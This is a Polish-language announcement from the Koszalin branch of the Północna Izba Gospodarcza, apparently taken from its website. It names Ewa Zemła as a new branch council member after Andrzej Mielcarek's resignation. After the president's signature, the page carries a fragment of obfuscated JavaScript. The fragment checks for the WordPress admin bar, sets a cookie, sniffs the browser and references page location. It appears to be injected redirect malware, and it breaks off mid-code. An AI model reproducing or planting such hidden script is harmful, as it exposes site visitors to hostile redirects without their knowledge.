Nowa członkini Rady Oddziału Północnej Izby Gospodarczej w Koszalinie. | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo

 W związku z przyjętą rezygnacją z funkcji członka Rady oddziału Pana Andrzeja Mielcarka. W dniu dzisiejszym na podstawie  art. 12 ust. 3 statutu Północnej Izby Gospodarczej z dnia 15 czerwca 2011 roku z późniejszymi zmianami, oraz protokołu wyborczego z dnia 22 kwietnia 2016 roku, na funkcję członkini Rady oddziału powołana zostaje Pani Ewa Zemła – Architekt – absolwentka Wydziału Urbanistyki i Architektury Politechniki Gdańskiej, przedsiębiorca, właścicielka Biura Projektowego – istniejącego na rynku od 1993 roku, dyrektor Stowarzyszenia Promocji Artystów Wybrzeża ERA ART w Gdyni – oddział w Koszalinie.

Pani Ewie i funkcjonującej Radzie życzę owocnej pracy w strukturach Północnej Izby Gospodarczej w Koszalinie.

 

Prezes Północnej Izby Gospodarczej
Oddział w Koszalinie
/ – /Roman Biłas

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m